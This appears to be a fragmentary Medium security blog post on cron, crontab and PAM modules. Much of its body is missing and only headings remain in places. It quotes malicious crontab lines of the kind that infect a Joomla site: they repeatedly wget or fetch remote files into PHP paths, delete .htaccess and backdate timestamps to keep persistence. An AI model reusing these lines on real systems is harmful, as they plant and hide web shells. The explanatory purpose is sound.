The power of cron

Using the crontab command

Who can use this command?

Scheduling jobs

cron vs. anacron

No, not the artist!

What does cron have to do with security?

About PAM

Another PAM
  • account modules check that the specified account is a valid authentication target under current conditions. This may include conditions like account expiration, time of day, and that the user has access to the requested service.
  • authentication modules verify the user’s identity, for example by requesting and checking a password or other secret. They may also pass authentication information on to other systems like a keyring.
  • password modules are responsible for updating passwords and are generally coupled to modules employed in the authentication step. They may also be used to enforce strong passwords.
  • session modules define actions that are performed at the beginning and end of sessions. A session starts after the user has successfully authenticated.
The account tab will be set to “required” by default.
Change the account tab to “sufficient” as seen here.
From Xiaodong Lin, Introductory Computer Forensics: A Hands-on Practical Approach, Springer, 2018, p. 310.

How a malicious actor could use cron to establish persistence

*/3 * * * * chmod 0755 /home3/infectedsite/public_html/libraries/joomla/utilities/compat/compat.php; wget http://  www.xxx  .com/wdc.txt -O /home3/infectedsite/public_html/libraries/joomla/utilities/compat/compat.php >/dev/null; 
* */6 * * * wget http:// www.xxx .com/PDF/rbkvgqdyle.txt -O /home3/infectedsite/public_html/libraries/simplepie/idn/7cuyng9o1a.php >/dev/null; fetch -o /home3/infectedsite/public_html/libraries/simplepie/idn/7cuyng9o1a.php http:// www.hestonsflorist .com/PDF/rbkvgqdyle.txt >/dev/null 2>&1; touch -t 201104202045 /home3/infectedsite/public_html/libraries/simplepie/idn/index.html >/dev/null; chmod 0755 /home3/infectedsite/public_html/libraries/simplepie/idn/.htaccess >/dev/null; rm /home3/infectedsite/public_html/libraries/simplepie/idn/.htaccess >/dev/null; touch -t 201104202045 /home3/infectedsite/public_html/libraries/simplepie/idn/.; touch -t 201104202045 /home3/infectedsite/public_html/libraries/simplepie/idn/7cuyng9o1a.php >/dev/null

--

--

--

A variety of topics related to the information security (infosec) field

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Repository Cleanup (Merged Branch Deletion)

Tutorial : Flutter App powered by Google Cloud Functions

5 Reasons Web Designers and Developers Will Never Go out of Business

Making animations with UE4 blueprints: the Timeline

20 Topics for DevOps Essential Training Road Map 2019

Farm Finance — 👨🏼‍🌾Getting started— Return On Investment ( ROI )👨🏼‍🌾

The Too Many Words Problem

How to build your own tradebot on hybrix

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Alex Myers Security Engineer

Alex Myers Security Engineer

A variety of topics related to the information security (infosec) field

More from Medium

This Linux Vulnerability could get you a root terminal in a snap | Nimbuspwn Vulnerability

AWS VPCs Peering:

Curl, Bash Scripting and Cron

Automate your SSH logins with this .bat script for your private network.